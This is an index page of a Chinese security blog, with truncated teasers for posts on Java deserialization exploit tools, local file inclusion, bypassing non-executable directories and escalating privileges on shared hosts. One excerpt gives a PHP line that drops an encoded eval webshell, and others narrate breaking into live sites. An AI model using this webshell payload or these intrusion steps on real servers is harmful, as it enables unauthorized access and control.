Java反序列化利用工具 -- Java Deserialization Exp Tools

Java反序列化漏洞已经被曝出一段时间了,本人参考了网上大神的放出来的工具,将Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。FreeBuf上已经公开了JBoss反序列化执行命令回显的工具,在本文中就不多做叙述了。其实,WebSphere的利用过程也和JBoss差不多,只不过在发送Payload和解析结果的时候多了个Base64编码(解码)的过程。 本工具暂时支持...

- 阅读全文 -

利用phpinfo信息LFI临时文件

还记得之前国外某牛提出的LFI包含临时文件么? 当时确实觉得有些鸡肋,因为临时文件的路径及名字是未知的,虽然临时文件的名字可以利用类似<>*?等通配符(我们暂且称其为通配符)匹配,而同时N个人一起请求的话可能同时生成很多临时文件,因此用通配符也不一定能匹配成,而且临时文件保存的路径也只能靠猜。 我们知道在向服务器上任意php文件post请求上传数据时,都会生成临时文件,以前不知道临时文...

- 阅读全文 -

LFI漏洞利用总结

主要涉及到的函数 include(),require()、include_once(),require_once() magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、 po...

- 阅读全文 -

LFI漏洞使用心得

1.找到LFI本地包含的漏洞 2.想办法上传不管是通过bbs,FCKEDITOR或者其他任何方式 3.使用如下代码 gif89a0<?fputs(fopen("3.php", "w"), base64_decode("JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1Qm5vdGhhY2slNUQlMjklM0IlM0YlM0U="));?>  ...

- 阅读全文 -

利用PERL突破目录无执行权限

前几天和谐一个站,独立服务器,就一个站,想提权应该不难。后来发现是坑爹的星外啊。草了啥目录多没权限执行。 翻来翻去翻到个PERL目录,这东西玩的少。在百度搜到一篇吐司发的文章,利用方法拿了权限。文章如下: 目标可写目录无执行权限.装有PERL。有运行权限。但system,exec,“,这几个函数没有权限。 注意PERL并非系统权限。而是继承的nt authority\network service...

- 阅读全文 -

谈对星外主机提权利用

T00LS上最近段时间谈了比较多星外提权的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!RegShell读注册表没发现多少利用的东西,但是根据些信息知道是星外 ...

- 阅读全文 -